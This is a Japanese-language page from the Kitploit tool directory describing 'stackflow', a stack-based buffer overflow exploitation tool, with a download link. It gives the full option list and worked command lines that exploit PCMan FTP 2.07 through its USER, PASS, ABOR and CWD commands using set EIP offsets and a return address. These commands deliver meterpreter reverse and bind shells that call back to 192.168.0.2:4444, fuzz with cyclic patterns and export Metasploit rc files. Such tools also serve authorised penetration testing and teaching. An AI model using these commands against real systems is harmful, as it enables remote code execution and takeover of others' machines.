Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
stackflow — 汎用スタックベースのバッファオーバーフローエクスプロイトツール | Kitploit
ツール/GitHubGitHub/d4rkcat/stackflow
ペイロード生成脆弱性分析エクスプロイトシェルコードデバッガファジングペネトレーションテストバイナリエクスプロイト
GitHubd4rkcat/stackflow

stackflow

汎用スタックベースのバッファオーバーフローエクスプロイトツール

リポジトリを見る
23812年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

stackflow

汎用スタックベースのバッファオーバーフローエクスプロイトツール

使い方

root@kitploit:~
usage: ./stackflow.py OPTIONS

optional arguments:
  -h, --help            show this help message and exit
  -r RHOST, --rhost RHOST
                        rhost
  -p RPORT, --rport RPORT
                        rport
  -c CMDS, --cmds CMDS  commands to send to server before overflow
  -v VULNCMD, --vulncmd VULNCMD
                        vulnerable command
  -o OFFSET, --offset OFFSET
                        offset to EIP
  -ao AUTOOFFSET, --autooffset AUTOOFFSET
                        calculate offset from cyclic pattern EIP string
  -a RETURNADD, --returnadd RETURNADD
                        return address
  -n NOPS, --nops NOPS  number of NOPS \x90 x 4 to prepend
  -m PAYLOAD, --payload PAYLOAD
                        MSF payload
  -i LHOST, --lhost LHOST
                        lhost
  -l LPORT, --lport LPORT
                        lport
  -f FUZZ, --fuzz FUZZ  Fuzz with cyclic pattern of size
  -t, --calc            Send calc.exe shellcode
  -t1, --cmdprompt      Send cmd.exe shellcode
  -d, --display         Display the exploit buffer
  -q, --quiet           Display less cruft
  -w TIMEOUT, --timeout TIMEOUT
                        Timeout for socket (Default: 5)
  -e CFEXPORT, --cfexport CFEXPORT
                        Export exploit config and metasploit rc file
  -g CFIMPORT, --cfimport CFIMPORT
                        Import and run exploit from config file
  -s STANDALONE, --standalone STANDALONE
                        Export exploit to a standalone python script

すべてのオプションは、コマンドラインで指定するか、設定ファイルから読み込むことができます。

WindowsXP SP3(ENG) 上で動作する PCMan FTP 2.07 の例:

脆弱なアプリ: http://www.exploit-db.com/wp-content/themes/exploit/applications/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z

コマンドなしでエクスプロイトし、192.168.0.2 のポート 4444 へコールバックする meterpreter/reverse_tcp シェルコードを送信:

root@kitploit:~
./stackflow.py -i 192.168.0.2 -l 4444 -r 192.168.0.9 -p 21 -o 2012 -m windows/meterpreter/reverse_tcp -a 7E429353

USER コマンドをエクスプロイトし、192.168.0.2 のポート 4444 へコールバックする meterpreter/reverse_tcp シェルコードを送信:

root@kitploit:~
./stackflow.py -i 192.168.0.2 -l 4444 -r 192.168.0.9 -p 21 -o 2007 -m windows/meterpreter/reverse_tcp -v 'USER' -a 7E429353

PASS コマンドをエクスプロイトし、calc.exe シェルコードを送信:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -o 6103 -v 'PASS' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -t

ABOR コマンドをエクスプロイトし、4444 で待ち受ける meterpreter/bind_tcp シェルコードを送信:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -o 2007 -v 'ABOR' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -l 4444 -m windows/meterpreter/bind_tcp

CWD コマンドをエクスプロイトし、cmd.exe シェルコードを送信して、エクスプロイトバッファを表示:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -o 2008 -v 'CWD' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -t1 -d

サイズ 3000 の循環バッファで STOR コマンドをファズする:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -v 'STOR' -c 'USER anonymous&PASS [email protected]' -f 3000

ファズクラッシュ後の EIP から取得した自動オフセット文字列を使用して CWD コマンドをエクスプロイトし、cmd.exe シェルコードを送信:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -ao o9Cp -v 'CWD' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -t1

エクスプロイトの py ファイルと metasploit rc ファイルをエクスポート:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -o 2008 -v 'CWD' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -e revCWD -l 4444 -m windows/meterpreter/reverse_tcp -i 192.168.0.2

msfconsole を起動し、エクスプロイトとハンドラを実行:

root@kitploit:~
msfconsole -r revCWD.rc

msfconsole からエクスプロイトとハンドラを実行:

root@kitploit:~
resource /path/to/revCWD.rc

設定ファイルからエクスプロイトを実行 (ハンドラなし!):

root@kitploit:~
./stackflow.py -g revCWD(.py)
ツールをダウンロード